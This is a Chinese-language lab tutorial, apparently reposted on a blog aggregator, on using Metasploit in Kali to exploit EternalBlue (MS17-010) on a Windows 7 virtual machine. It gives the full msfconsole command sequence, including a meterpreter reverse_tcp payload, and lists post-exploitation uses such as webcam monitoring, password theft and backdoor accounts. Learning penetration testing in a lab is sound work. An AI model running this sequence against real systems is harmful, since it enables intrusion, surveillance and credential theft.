在Kali操作系统上使用metasploit
目錄
<一>:metasploit 簡述
<二>:msf 使用法則
<三>:啟動(dòng) metasploit 前需要做的事項(xiàng)
<四>:metasploit 攻擊 windows 系統(tǒng)
?????????metasploit 攻擊 eternalblue(永恒之藍(lán))全流程:
??????????????? (1):使用模塊
??????????????? (2):配置模塊必選項(xiàng)
??????????????? (3):運(yùn)行模塊
????????????? (4):設(shè)置必選項(xiàng)(補(bǔ)充)
<五>:meterpreter 攻擊成功后能做什么
<一>:metasploit 簡述
??????????????? metasploit 簡稱 msf,是一款開源安全漏洞利用和測試工具,集成了各種平臺(tái)上常見的溢出漏洞和流行的 shellcode,并持續(xù)保持更新。
<二>:msf 使用法則
??????????????? 使用模塊 ->配置模塊必選項(xiàng)->運(yùn)行模塊
<三>:啟動(dòng) metasploit 前需要做的事項(xiàng)
??????????????? ①:打開Kali終端
??????????????? ②:使用sudo su 命令,并輸入 Kali 的密碼,切換至root用戶
??????????????? ③:使用 msfdb init 命令初始化 metasploit 數(shù)據(jù)庫(*可選)
<四>:metasploit 攻擊 windows 系統(tǒng)
??????????????? msfconsole:啟動(dòng) metasploit 命令行 (命令行效率高,方便使用)
?????????metasploit 攻擊 eternalblue(永恒之藍(lán))全流程:
??????????????? (1):使用模塊
???????????????????????????????①:搜索微軟給永恒之藍(lán)的漏洞號(hào):search ms17_010
?????????????????????????????? ②: 使用此漏洞:use exploit/windows/smb/ms17_010_eternalblue
??????????????? (2):配置模塊必選項(xiàng)
??????????????????????????????? 查看必選項(xiàng)[*required 為 yes 的就是必選項(xiàng)]
????????????????????????????????????????①:show options (查看設(shè)置)
????????????????(3):運(yùn)行模塊
?????????????????????????????????? 以虛擬機(jī)上的xin7操作系統(tǒng)為靶機(jī)為例 (先同時(shí)按win+R,然后輸入cmd,回車,最后輸入ipconfig,查看被攻擊的靶機(jī)IP地址)
????????????????????????????????????????①:set RHosts 被攻擊的IP地址
????????????????????????????????????????②:show options (查看是否還有必選項(xiàng)需要修改)
????????????????????????????????????????③:set LPORT 0~65536 (為了防止攻擊失敗多設(shè)置一個(gè))
????????????????????????????????????????④:run (攻擊操作系統(tǒng),并獲取命令運(yùn)行最低權(quán)限)
?
(注:顯示攻擊失敗表示目標(biāo)主機(jī)上沒有此漏洞,此漏洞只適用于攻擊自己的win7靶機(jī),高版本的系統(tǒng)已經(jīng)修復(fù)此漏洞,顯示W(wǎng)IN 表示攻擊成功,其他則是失敗)
????????????? (4):設(shè)置必選項(xiàng)(補(bǔ)充)
???????????????????????????????????①: set RHosts 被攻擊的IP地址
??????????????????????????????????????? [*RHOSTS 為 target host(s)代表要攻擊誰]
?????????????????????????????????? ②: set Payload windows/x64/meterpreter/reverse_tcp
???????????????????????????????????????? [*Payload 是攻擊載荷,就是攻擊完成后想獲取的東西,這里是想獲取 meterpreter]
????????????????????????????????????????[*meterpreter 是metasploit 后滲透的神器 ]
???????????????????????????????? ③:set LHOST 攻擊的IP地址
??????????????????????????????????????? [*LHOST 為 listen host 代表你是誰]
??????????????????????????????? ④:set LPORT 攻擊方使用的監(jiān)聽端口
??????????????????????????????????????? [* LPORT 為 listen port 代表要在攻擊方上開啟的端口,1~65535隨便選,但不能被占用]
??????????????????? (5):meterpreter 后輸入 help,可顯示攻擊成功后可用的權(quán)限
<五>:meterpreter 攻擊成功后能做什么
??????????????? meterpreter 是強(qiáng)大的后滲透模塊,可以輸入help 查看幫助信息,遠(yuǎn)程控制、命令執(zhí)行、攝像頭監(jiān)控、密碼獲取、創(chuàng)建后門用戶、破壞篡改系統(tǒng).......這些看起來非常復(fù)雜又高級(jí)的操作都能用meterpreter 中的一行或幾個(gè)字母,簡單的命令完成。
(注:此文章及操作流程只限于學(xué)習(xí)交流,請(qǐng)勿進(jìn)行非法操作,做遵紀(jì)守法公民)
總結(jié)
以上是生活随笔為你收集整理的在Kali操作系统上使用metasploit的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 半导体显示丨三星显示器拟投资逾21.5亿
- 下一篇: 集成/信息系统项目管理师学习笔记共享 (